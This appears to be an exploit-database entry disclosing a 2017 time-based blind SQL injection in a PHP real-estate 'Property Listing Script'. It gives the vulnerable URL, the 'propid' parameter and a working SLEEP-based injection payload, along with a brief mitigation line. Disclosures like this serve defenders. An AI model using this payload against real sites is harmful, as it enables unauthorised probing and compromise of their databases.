header-logo
Suggest Exploit
vendor:
Property Listing Script
by:
Kaan KAMIS
6,4
CVSS
MEDIUM
Time-Based Blind Injection
89
CWE
Product Name: Property Listing Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Property Listing Script – Time-Based Blind Injection

Advanced PHP Real-Estate Script is vulnerable to a time-based blind injection attack. The vulnerable URL is http://locahost/property-list/property_view.php?propid=443[payload], where the parameter 'propid' is vulnerable to the attack. The payload used is propid=443' AND SLEEP(5) AND 'FBop'='FBop.

Mitigation:

Input validation and sanitization should be used to prevent time-based blind injection attacks.
Source

Exploit-DB raw data:

Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.

Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind

Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop

Navigation

Suggest Exploit

Services By CQR